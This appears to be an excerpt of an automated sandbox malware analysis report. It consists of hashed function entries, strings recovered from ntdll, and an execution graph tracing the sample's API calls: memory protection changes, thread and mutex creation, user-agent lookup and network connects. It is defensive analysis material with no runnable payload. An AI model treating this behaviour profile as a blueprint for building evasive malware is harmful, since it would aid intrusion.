                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2b6a54fb96583cc2706f2e66a6fac864c1c8eb5c213b074af715aabe76f0ae4d
                                                                                                  • Instruction ID: 2e1a85dfa57c25a140d166ffea0809225342673a90038bffaf0bb33a7114cb03
                                                                                                  • Opcode Fuzzy Hash: 2b6a54fb96583cc2706f2e66a6fac864c1c8eb5c213b074af715aabe76f0ae4d
                                                                                                  • Instruction Fuzzy Hash: 6090022120584442D24072584804B0F811597E1202F95C129B455A564DC9258A566722
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 782015879c69e78ebfca22a01cd8cae6efb902eb88897fc7b5b00554b9021be6
                                                                                                  • Instruction ID: c7b7ef8df28071897b6e26d20d984bd0688ec2ab9ecdd5f9e9fac2559b699a30
                                                                                                  • Opcode Fuzzy Hash: 782015879c69e78ebfca22a01cd8cae6efb902eb88897fc7b5b00554b9021be6
                                                                                                  • Instruction Fuzzy Hash: A590022124540802D240715884147074016D7D0601F55C121B0428564EC6268B6677B2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: eb853077c4436e38d6c172c8717c8d92a62f17b6bb6753a82c57c2b4b4d91fa3
                                                                                                  • Instruction ID: a5f9be19a7a0199f586f7a851576606422cc77af9038356e62bce5adcd48e779
                                                                                                  • Opcode Fuzzy Hash: eb853077c4436e38d6c172c8717c8d92a62f17b6bb6753a82c57c2b4b4d91fa3
                                                                                                  • Instruction Fuzzy Hash: 7390023160950402D20071584514706501597D0201F65C521B0828578EC7A58B5276A3
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f0a8efece63aff2138a5a3f7f88b509b3a9d7d8df2333ea281defef1f54d9089
                                                                                                  • Instruction ID: ffaa733a1315e771a45c3d645a9bcf320543d7f146274da86c486a6cbbf7d86d
                                                                                                  • Opcode Fuzzy Hash: f0a8efece63aff2138a5a3f7f88b509b3a9d7d8df2333ea281defef1f54d9089
                                                                                                  • Instruction Fuzzy Hash: 9890022124945102D250715C44046168015B7E0201F55C131B0C185A4EC5658A567322
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d57a173e7c2aa88969a20184cbfb55485613142d36ff21d854a2f6a29e3607fa
                                                                                                  • Instruction ID: 56eaa978ec11c92422fde0f7182dbbe6a52a4dbb80a5af284abb80aa06f75734
                                                                                                  • Opcode Fuzzy Hash: d57a173e7c2aa88969a20184cbfb55485613142d36ff21d854a2f6a29e3607fa
                                                                                                  • Instruction Fuzzy Hash: FE90023520540402D61071585804646405697D0301F55D521B0828568EC6648AA2B222
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b17df0c7a06a18bdd4bbc8a10920ae0e602b44b6a6604154fd58987b8546e2a8
                                                                                                  • Instruction ID: e2fe65a4f4d93b372368ae39c4e512e11998771e5317bb1659b22b912575fa3d
                                                                                                  • Opcode Fuzzy Hash: b17df0c7a06a18bdd4bbc8a10920ae0e602b44b6a6604154fd58987b8546e2a8
                                                                                                  • Instruction Fuzzy Hash: 0B90023120640142964072585804A4E811597E1302B95D525B0419564DC9248A626322
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                  • Instruction ID: 0953ac074b5d5e03b1541020d3112ff905d7c36fc5a1d2a93ce40f8272af59ff
                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                  • Instruction Fuzzy Hash:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                  • API String ID: 48624451-2108815105
                                                                                                  • Opcode ID: 3d9276700407fdc7c3ed9bc83d7d04018f4de2d181a0e7be7beb62560ae8be8b
                                                                                                  • Instruction ID: 949c6bbc00fde1758d3f5742f8d8de542e08d1fdd3ebcf8a93172f653784db72
                                                                                                  • Opcode Fuzzy Hash: 3d9276700407fdc7c3ed9bc83d7d04018f4de2d181a0e7be7beb62560ae8be8b
                                                                                                  • Instruction Fuzzy Hash: 4D5108B2B04126BFCB21DFAC889097EFBB8BB482407548269F4A5D7642D774DE41C7E0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                  • API String ID: 48624451-2108815105
                                                                                                  • Opcode ID: 29f4720acfbf07482cb30bf990d5da04858b122b28c8e43e17185b198ef08d46
                                                                                                  • Instruction ID: 41d3bfc7a0a058c7905b852a9f9622b3edf251466047ea64b40d3aca19b8c300
                                                                                                  • Opcode Fuzzy Hash: 29f4720acfbf07482cb30bf990d5da04858b122b28c8e43e17185b198ef08d46
                                                                                                  • Instruction Fuzzy Hash: B951F4B1A00645BECF30EF9DD89097FFBF8AB44200B148499E596C7683EA74DE448760
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • ExecuteOptions, xrefs: 017546A0
                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01754725
                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01754742
                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01754655
                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01754787
                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017546FC
                                                                                                  • Execute=1, xrefs: 01754713
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                  • API String ID: 0-484625025
                                                                                                  • Opcode ID: 2b5060ba4ad8a2f0b3d2e0e1ec0cb4724113b06a9c2c8f73a2a13fb4e38dbf82
                                                                                                  • Instruction ID: 833f3fd74d5866ef0e909d889074a5793f357afe752f6323371b41c6cb8598b3
                                                                                                  • Opcode Fuzzy Hash: 2b5060ba4ad8a2f0b3d2e0e1ec0cb4724113b06a9c2c8f73a2a13fb4e38dbf82
                                                                                                  • Instruction Fuzzy Hash: AA511A3160021AAAEF15ABADDC99FBDF7B8EF15710F0404DDEA06A7185EB709E418F50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: +$-$0$0
                                                                                                  • API String ID: 1302938615-699404926
                                                                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                  • Instruction ID: 92ce2539cb595a3fe88e400718c096bd1050def57447df32ab432122eb005a49
                                                                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                  • Instruction Fuzzy Hash: 7E81F270E452698EEF25CF6CC8907FEFBB2AF45320F18415AD861A7392C7749842CB51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                  • API String ID: 48624451-2819853543
                                                                                                  • Opcode ID: 85d059d128ffa54a834328016595b1ad338541aa0eb612bf688ec480c2ab5ea8
                                                                                                  • Instruction ID: 4ea3efa7cc46a85a9e3b2bd8772c990414b3d0b431627f1fdbcc0312e1ccfd4e
                                                                                                  • Opcode Fuzzy Hash: 85d059d128ffa54a834328016595b1ad338541aa0eb612bf688ec480c2ab5ea8
                                                                                                  • Instruction Fuzzy Hash: 732177BAE00119ABDB10EF79EC44AFEFBF9EF54650F140116E945D3205E730D9158BA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017502BD
                                                                                                  • RTL: Re-Waiting, xrefs: 0175031E
                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017502E7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                  • API String ID: 0-2474120054
                                                                                                  • Opcode ID: 30887ae75fab6c0d2954211f0b49fe12682031a5d5c390de6705b174d8ec252a
                                                                                                  • Instruction ID: 3919a05da8a9e0027b1f56f7e8ad51c0eb498b8712235a21bffdce1209a6d37a
                                                                                                  • Opcode Fuzzy Hash: 30887ae75fab6c0d2954211f0b49fe12682031a5d5c390de6705b174d8ec252a
                                                                                                  • Instruction Fuzzy Hash: 2CE18B70608742DFD766CF28C884B2AFBE0BB84714F144A6DF9A58B2E1D774D945CB42
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  • RTL: Re-Waiting, xrefs: 01757BAC
                                                                                                  • RTL: Resource at %p, xrefs: 01757B8E
                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01757B7F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  • API String ID: 0-871070163
                                                                                                  • Opcode ID: b4bb895369d2630c241d5a9372aab162cf5f6f3df9f774c457d4caec0498c4c9
                                                                                                  • Instruction ID: b1fbfbea7ac871f4d79518faa3d9e4fa77171c2e7b33e910407aa21fe238d1af
                                                                                                  • Opcode Fuzzy Hash: b4bb895369d2630c241d5a9372aab162cf5f6f3df9f774c457d4caec0498c4c9
                                                                                                  • Instruction Fuzzy Hash: 6841B0317047029FD725DE2DC840B6AF7E9EB98710F100A2DF95A9B684DB71E9058B91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0175728C
                                                                                                  Strings
                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01757294
                                                                                                  • RTL: Re-Waiting, xrefs: 017572C1
                                                                                                  • RTL: Resource at %p, xrefs: 017572A3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                  • API String ID: 885266447-605551621
                                                                                                  • Opcode ID: 7deed3461a032fcc0af54699cf0a93f49f916a87a5709b535a5e236433031c48
                                                                                                  • Instruction ID: d53a34d191d86e46b3ab184f9075e9598fa6f509c3e5be69b3f651d63e5386e6
                                                                                                  • Opcode Fuzzy Hash: 7deed3461a032fcc0af54699cf0a93f49f916a87a5709b535a5e236433031c48
                                                                                                  • Instruction Fuzzy Hash: E541FD31648206ABDB24CE2ACC41B6AFBB5FB98750F104619FD55EB280DB71E8428BD1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: %%%u$]:%u
                                                                                                  • API String ID: 48624451-3050659472
                                                                                                  • Opcode ID: b48d3271bcfd9338e56db3c9b1c93865c80665d0d0eb40b1706961e7bd06e19b
                                                                                                  • Instruction ID: 18d635c7ac1537a6d67d8ed1750dc5035fa90977cc6649eaab85d055182808da
                                                                                                  • Opcode Fuzzy Hash: b48d3271bcfd9338e56db3c9b1c93865c80665d0d0eb40b1706961e7bd06e19b
                                                                                                  • Instruction Fuzzy Hash: B1318672A00219AFDF20DE2DEC40BEEF7F8EB54610F554559E949E3245EB309A498BA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: +$-
                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                  • Instruction ID: 5b07ad2e5d412cdf570150d72645bba057f2e6db39a67ad43184160f409c547e
                                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                  • Instruction Fuzzy Hash: FE91D571E042369BEB28DF6DCA81ABEFBA1FF64320F14451AE955E72C4D73089438721
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $$@
                                                                                                  • API String ID: 0-1194432280
                                                                                                  • Opcode ID: b3b3c23fda5a3a0e677efa5b8257d5a2782c688ed854c25a56aed286936c5f09
                                                                                                  • Instruction ID: 2d809180ec0fb774440ba12f791727291973ce8194449404fbcfe50e94128a51
                                                                                                  • Opcode Fuzzy Hash: b3b3c23fda5a3a0e677efa5b8257d5a2782c688ed854c25a56aed286936c5f09
                                                                                                  • Instruction Fuzzy Hash: 04812B71D012699BDB31CB54CC48BEEBBB4AF08754F1041EAEA19B7281D7309E85CFA4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:2.3%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:4.7%
                                                                                                  Total number of Nodes:444
                                                                                                  Total number of Limit Nodes:16
                                                                                                  execution_graph 13741 10e23ce2 13743 10e23dd9 13741->13743 13742 10e24022 13743->13742 13747 10e23352 13743->13747 13745 10e23f0d 13745->13742 13756 10e23792 13745->13756 13748 10e2339e 13747->13748 13749 10e2358e 13748->13749 13750 10e234ec 13748->13750 13752 10e23595 13748->13752 13749->13745 13751 10e29232 NtCreateFile 13750->13751 13754 10e234ff 13751->13754 13752->13749 13753 10e29232 NtCreateFile 13752->13753 13753->13749 13754->13749 13755 10e29232 NtCreateFile 13754->13755 13755->13749 13757 10e237e0 13756->13757 13758 10e29232 NtCreateFile 13757->13758 13760 10e2390c 13758->13760 13759 10e23af3 13759->13745 13760->13759 13761 10e23352 NtCreateFile 13760->13761 13762 10e23602 NtCreateFile 13760->13762 13761->13760 13762->13760 13933 10e20b66 13935 10e20b6a 13933->13935 13934 10e20cce 13935->13934 13936 10e20cb5 CreateMutexW 13935->13936 13936->13934 13763 10e262e4 13764 10e2636f 13763->13764 13765 10e26305 13763->13765 13765->13764 13767 10e260c2 13765->13767 13768 10e260cb 13767->13768 13770 10e261f0 13767->13770 13769 10e29f82 6 API calls 13768->13769 13768->13770 13769->13770 13770->13764 13852 10e2522a 13853 10e2525e 13852->13853 13854 10e248c2 ObtainUserAgentString 13853->13854 13855 10e2526b 13854->13855 13817 10e2baa9 13818 10e2baaf 13817->13818 13821 10e26212 13818->13821 13820 10e2bac7 13822 10e26237 13821->13822 13823 10e2621b 13821->13823 13822->13820 13823->13822 13824 10e260c2 6 API calls 13823->13824 13824->13822 13969 10e2672e 13970 10e2676a 13969->13970 13971 10e26788 connect 13969->13971 13970->13971 13595 10e2abac 13596 10e2abb1 13595->13596 13629 10e2abb6 13596->13629 13630 10e20b72 13596->13630 13598 10e2ac2c 13599 10e2ac85 13598->13599 13601 10e2ac54 13598->13601 13602 10e2ac69 13598->13602 13598->13629 13600 10e28ab2 NtProtectVirtualMemory 13599->13600 13603 10e2ac8d 13600->13603 13604 10e28ab2 NtProtectVirtualMemory 13601->13604 13605 10e2ac80 13602->13605 13606 10e2ac6e 13602->13606 13666 10e22102 13603->13666 13608 10e2ac5c 13604->13608 13605->13599 13610 10e2ac97 13605->13610 13609 10e28ab2 NtProtectVirtualMemory 13606->13609 13652 10e21ee2 13608->13652 13614 10e2ac76 13609->13614 13611 10e2acbe 13610->13611 13612 10e2ac9c 13610->13612 13616 10e2acc7 13611->13616 13617 10e2acd9 13611->13617 13611->13629 13634 10e28ab2 13612->13634 13658 10e21fc2 13614->13658 13618 10e28ab2 NtProtectVirtualMemory 13616->13618 13621 10e28ab2 NtProtectVirtualMemory 13617->13621 13617->13629 13620 10e2accf 13618->13620 13676 10e222f2 13620->13676 13624 10e2ace5 13621->13624 13694 10e22712 13624->13694 13631 10e20b93 13630->13631 13632 10e20cb5 CreateMutexW 13631->13632 13633 10e20cce 13631->13633 13632->13633 13633->13598 13636 10e28adf 13634->13636 13635 10e28ebc 13644 10e21de2 13635->13644 13636->13635 13706 10e1e8f2 13636->13706 13638 10e28e5c 13639 10e1e8f2 NtProtectVirtualMemory 13638->13639 13640 10e28e7c 13639->13640 13641 10e1e8f2 NtProtectVirtualMemory 13640->13641 13642 10e28e9c 13641->13642 13643 10e1e8f2 NtProtectVirtualMemory 13642->13643 13643->13635 13646 10e21df0 13644->13646 13645 10e21ecd 13648 10e1e412 13645->13648 13646->13645 13729 10e25382 13646->13729 13650 10e1e440 13648->13650 13649 10e1e473 13649->13629 13650->13649 13651 10e1e44d CreateThread 13650->13651 13651->13629 13654 10e21f06 13652->13654 13653 10e21fa4 13653->13629 13654->13653 13655 10e1e8f2 NtProtectVirtualMemory 13654->13655 13656 10e21f9c 13655->13656 13657 10e25382 ObtainUserAgentString 13656->13657 13657->13653 13660 10e22016 13658->13660 13659 10e220f0 13659->13629 13660->13659 13663 10e220bb 13660->13663 13664 10e1e8f2 NtProtectVirtualMemory 13660->13664 13661 10e220e8 13662 10e25382 ObtainUserAgentString 13661->13662 13662->13659 13663->13661 13665 10e1e8f2 NtProtectVirtualMemory 13663->13665 13664->13663 13665->13661 13668 10e22137 13666->13668 13667 10e222d5 13667->13629 13668->13667 13669 10e1e8f2 NtProtectVirtualMemory 13668->13669 13670 10e2228a 13669->13670 13671 10e1e8f2 NtProtectVirtualMemory 13670->13671 13674 10e222a9 13671->13674 13672 10e222cd 13673 10e25382 ObtainUserAgentString 13672->13673 13673->13667 13674->13672 13675 10e1e8f2 NtProtectVirtualMemory 13674->13675 13675->13672 13677 10e22349 13676->13677 13678 10e2249f 13677->13678 13680 10e1e8f2 NtProtectVirtualMemory 13677->13680 13679 10e1e8f2 NtProtectVirtualMemory 13678->13679 13683 10e224c3 13678->13683 13679->13683 13681 10e22480 13680->13681 13682 10e1e8f2 NtProtectVirtualMemory 13681->13682 13682->13678 13684 10e1e8f2 NtProtectVirtualMemory 13683->13684 13685 10e22597 13683->13685 13684->13685 13686 10e1e8f2 NtProtectVirtualMemory 13685->13686 13688 10e225bf 13685->13688 13686->13688 13687 10e226e1 13689 10e25382 ObtainUserAgentString 13687->13689 13690 10e1e8f2 NtProtectVirtualMemory 13688->13690 13691 10e226b9 13688->13691 13692 10e226e9 13689->13692 13690->13691 13691->13687 13693 10e1e8f2 NtProtectVirtualMemory 13691->13693 13692->13629 13693->13687 13695 10e22767 13694->13695 13696 10e1e8f2 NtProtectVirtualMemory 13695->13696 13699 10e22903 13695->13699 13697 10e228e3 13696->13697 13698 10e1e8f2 NtProtectVirtualMemory 13697->13698 13698->13699 13702 10e1e8f2 NtProtectVirtualMemory 13699->13702 13703 10e22992 13699->13703 13700 10e229b7 13701 10e25382 ObtainUserAgentString 13700->13701 13704 10e229bf 13701->13704 13702->13703 13703->13700 13705 10e1e8f2 NtProtectVirtualMemory 13703->13705 13704->13629 13705->13700 13707 10e1e987 13706->13707 13710 10e1e9b2 13707->13710 13721 10e1f622 13707->13721 13709 10e1ec0c 13709->13638 13710->13709 13711 10e1eba2 13710->13711 13714 10e1eac5 13710->13714 13712 10e2ae12 NtProtectVirtualMemory 13711->13712 13713 10e1eb5b 13712->13713 13713->13709 13716 10e2ae12 NtProtectVirtualMemory 13713->13716 13725 10e2ae12 13714->13725 13716->13709 13717 10e1eae3 13717->13709 13718 10e1eb3d 13717->13718 13719 10e2ae12 NtProtectVirtualMemory 13717->13719 13720 10e2ae12 NtProtectVirtualMemory 13718->13720 13719->13718 13720->13713 13722 10e1f67a 13721->13722 13723 10e2ae12 NtProtectVirtualMemory 13722->13723 13724 10e1f67e 13722->13724 13723->13722 13724->13710 13726 10e2ae45 NtProtectVirtualMemory 13725->13726 13727 10e29942 13725->13727 13728 10e2ae70 13726->13728 13727->13726 13728->13717 13730 10e253c7 13729->13730 13733 10e25232 13730->13733 13732 10e25438 13732->13645 13734 10e2525e 13733->13734 13737 10e248c2 13734->13737 13736 10e2526b 13736->13732 13739 10e24934 13737->13739 13738 10e249a6 13738->13736 13739->13738 13740 10e24995 ObtainUserAgentString 13739->13740 13740->13738 13856 10e1f42e 13857 10e1f45b 13856->13857 13865 10e1f4c9 13856->13865 13858 10e29232 NtCreateFile 13857->13858 13857->13865 13859 10e1f496 13858->13859 13861 10e1f082 NtCreateFile 13859->13861 13864 10e1f4c5 13859->13864 13860 10e29232 NtCreateFile 13860->13865 13862 10e1f4b6 13861->13862 13863 10e1ef52 NtCreateFile 13862->13863 13862->13864 13863->13864 13864->13860 13864->13865 13482 10e29232 13483 10e2925c 13482->13483 13485 10e29334 13482->13485 13484 10e29410 NtCreateFile 13483->13484 13483->13485 13484->13485 13771 10e1e0f1 13772 10e1e109 13771->13772 13773 10e1e1d3 13771->13773 13774 10e1e012 6 API calls 13772->13774 13775 10e1e113 13774->13775 13775->13773 13776 10e29f82 6 API calls 13775->13776 13776->13773 13888 10e1f5f1 13889 10e1f606 13888->13889 13890 10e1f60e 13888->13890 13891 10e24662 6 API calls 13889->13891 13891->13890 13908 10e2b9b3 13909 10e2b9bd 13908->13909 13912 10e206d2 13909->13912 13911 10e2b9e0 13913 10e206f7 13912->13913 13914 10e20704 13912->13914 13915 10e1e0f2 6 API calls 13913->13915 13916 10e20737 13914->13916 13917 10e2072d 13914->13917 13920 10e206ff 13914->13920 13915->13920 13919 10e29f82 6 API calls 13916->13919 13916->13920 13921 10e262c2 13917->13921 13919->13920 13920->13911 13922 10e262cb 13921->13922 13923 10e262df 13921->13923 13922->13923 13924 10e260c2 6 API calls 13922->13924 13923->13920 13924->13923 13892 10e2b9f1 13893 10e2b9f7 13892->13893 13896 10e20852 13893->13896 13895 10e2ba0f 13897 10e208e4 13896->13897 13898 10e20865 13896->13898 13897->13895 13898->13897 13900 10e20887 13898->13900 13902 10e2087e 13898->13902 13899 10e2636f 13899->13895 13900->13897 13901 10e24662 6 API calls 13900->13901 13901->13897 13902->13899 13903 10e260c2 6 API calls 13902->13903 13903->13899 13777 10e222f4 13778 10e22349 13777->13778 13779 10e2249f 13778->13779 13781 10e1e8f2 NtProtectVirtualMemory 13778->13781 13780 10e1e8f2 NtProtectVirtualMemory 13779->13780 13784 10e224c3 13779->13784 13780->13784 13782 10e22480 